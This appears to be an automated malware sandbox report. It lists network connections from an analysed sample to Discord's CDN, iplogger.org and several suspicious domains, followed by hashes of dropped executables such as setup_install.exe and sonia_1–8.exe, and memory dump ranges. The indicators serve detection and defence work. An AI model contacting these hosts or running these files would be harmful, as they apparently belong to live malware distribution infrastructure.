N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 8.8.8.8:53 i.spesgrt.com udp
N/A 162.159.133.233:80 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 172.67.153.179:80 i.spesgrt.com tcp
N/A 8.8.8.8:53 www.anderesitebrauchen.com udp
N/A 8.8.8.8:53 flamkravmaga.com udp
N/A 8.8.8.8:53 a.xyzgame.vip udp
N/A 8.8.8.8:53 www.szwbjs.com udp
N/A 172.67.173.218:80 a.xyzgame.vip tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 172.67.173.218:80 a.xyzgame.vip tcp
N/A 172.67.173.218:80 a.xyzgame.vip tcp
N/A 172.67.173.218:80 a.xyzgame.vip tcp
N/A 172.67.173.218:443 a.xyzgame.vip tcp
N/A 103.155.93.196:80 www.szwbjs.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 b.xyzgame.cc udp
N/A 104.21.51.99:443 b.xyzgame.cc tcp
N/A 127.0.0.1:64206 tcp
N/A 127.0.0.1:64208 tcp
N/A 8.8.8.8:53 uehge4g6gh.2ihsfa.com udp
N/A 207.246.94.159:80 uehge4g6gh.2ihsfa.com tcp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 88.99.66.31:443 iplogger.org tcp
N/A 8.8.8.8:53 flamkravmaga.com udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 www.microsoft.com udp
N/A 204.79.197.200:443 ieonline.microsoft.com tcp
N/A 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/1348-59-0x00000000762C1000-0x00000000762C3000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

memory/1176-63-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS44550A84\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS44550A84\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS44550A84\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

memory/1176-80-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1176-82-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1176-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1176-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1176-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.txt

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

memory/1176-97-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.txt

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

memory/1176-99-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1176-100-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/836-101-0x0000000000000000-mapping.dmp

memory/1344-98-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_6.txt

MD5 0c3f670f496ffcf516fe77d2a161a6ee
SHA1 0c59d3494b38d768fe120e0a4ca2a1dca7567e6e
SHA256 8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0
SHA512 bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

memory/1060-105-0x0000000000000000-mapping.dmp

memory/1048-103-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.txt

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.txt

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.txt

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.txt

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.txt

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

memory/1176-88-0x0000000000400000-0x000000000051D000-memory.dmp

memory/1176-87-0x0000000000400000-0x000000000051D000-memory.dmp

memory/1176-86-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1176-81-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1456-107-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.exe

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

memory/1544-155-0x0000000000200000-0x0000000000201000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

memory/1384-158-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

memory/1544-160-0x0000000000410000-0x0000000000411000-memory.dmp

\Users\Admin\AppData\Local\Temp\CC4F.tmp

MD5 d124f55b9393c976963407dff51ffa79
SHA1 2c7bbedd79791bfb866898c85b504186db610b5d
SHA256 ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef
SHA512 278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

memory/1544-157-0x000000001AFE0000-0x000000001AFE2000-memory.dmp

memory/1544-156-0x0000000000440000-0x0000000000463000-memory.dmp

memory/1536-162-0x00000000003C0000-0x00000000003C9000-memory.dmp

memory/1536-163-0x0000000000400000-0x000000000088F000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

memory/1544-147-0x0000000000070000-0x0000000000071000-memory.dmp

memory/1384-146-0x0000000000000000-mapping.dmp

memory/1356-138-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.exe

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.exe

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

memory/640-129-0x0000000000B40000-0x0000000000B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

memory/1544-126-0x0000000000000000-mapping.dmp

memory/1788-121-0x0000000000000000-mapping.dmp

memory/432-124-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

memory/640-117-0x0000000000000000-mapping.dmp

memory/900-120-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.exe

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.exe

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

memory/1536-115-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

memory/432-165-0x0000000002160000-0x00000000021FD000-memory.dmp

memory/1220-164-0x0000000002B20000-0x0000000002B35000-memory.dmp

memory/1420-109-0x0000000000000000-mapping.dmp

memory/632-106-0x0000000000000000-mapping.dmp

memory/1808-167-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Chrome2.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

memory/1736-173-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Install2.EXE

MD5 ab5eae79062ddedb6715c265dddd9044
SHA1 254a9f7bd992f0e2dd1c33dc03db60050402df84
SHA256 8a87cc9fab38ab661ed147f2b39b85582e9ee7671006780f528d6fddb377f75f
SHA512 28e2568646d8a103e138a0f5bc15a785aeb6b41f87c30be9db556c4baf58a25902bb94cb72d861cbfc24f3829342d50ce891e0637ccd04ac9252abe60b33ab4d

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

MD5 6e61e25e7dc311d34b4a37e9c42d4079
SHA1 f623f0c66d599a12677cabcb0140034b5cf969bf
SHA256 55366854ece30f35d98d54b9fdfd48b0c4482bdfd4aacb59c78ccde8ce89bd9d
SHA512 da2f50a9139bcaa89680d939b905187574d2b84b89436f570c2e218680dad5c3d880cfc9e434f26c059d6602a334f2488afae4e9b92fcdc022928164400b7314

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

MD5 6e61e25e7dc311d34b4a37e9c42d4079
SHA1 f623f0c66d599a12677cabcb0140034b5cf969bf
SHA256 55366854ece30f35d98d54b9fdfd48b0c4482bdfd4aacb59c78ccde8ce89bd9d
SHA512 da2f50a9139bcaa89680d939b905187574d2b84b89436f570c2e218680dad5c3d880cfc9e434f26c059d6602a334f2488afae4e9b92fcdc022928164400b7314

memory/1740-183-0x0000000001380000-0x0000000001381000-memory.dmp

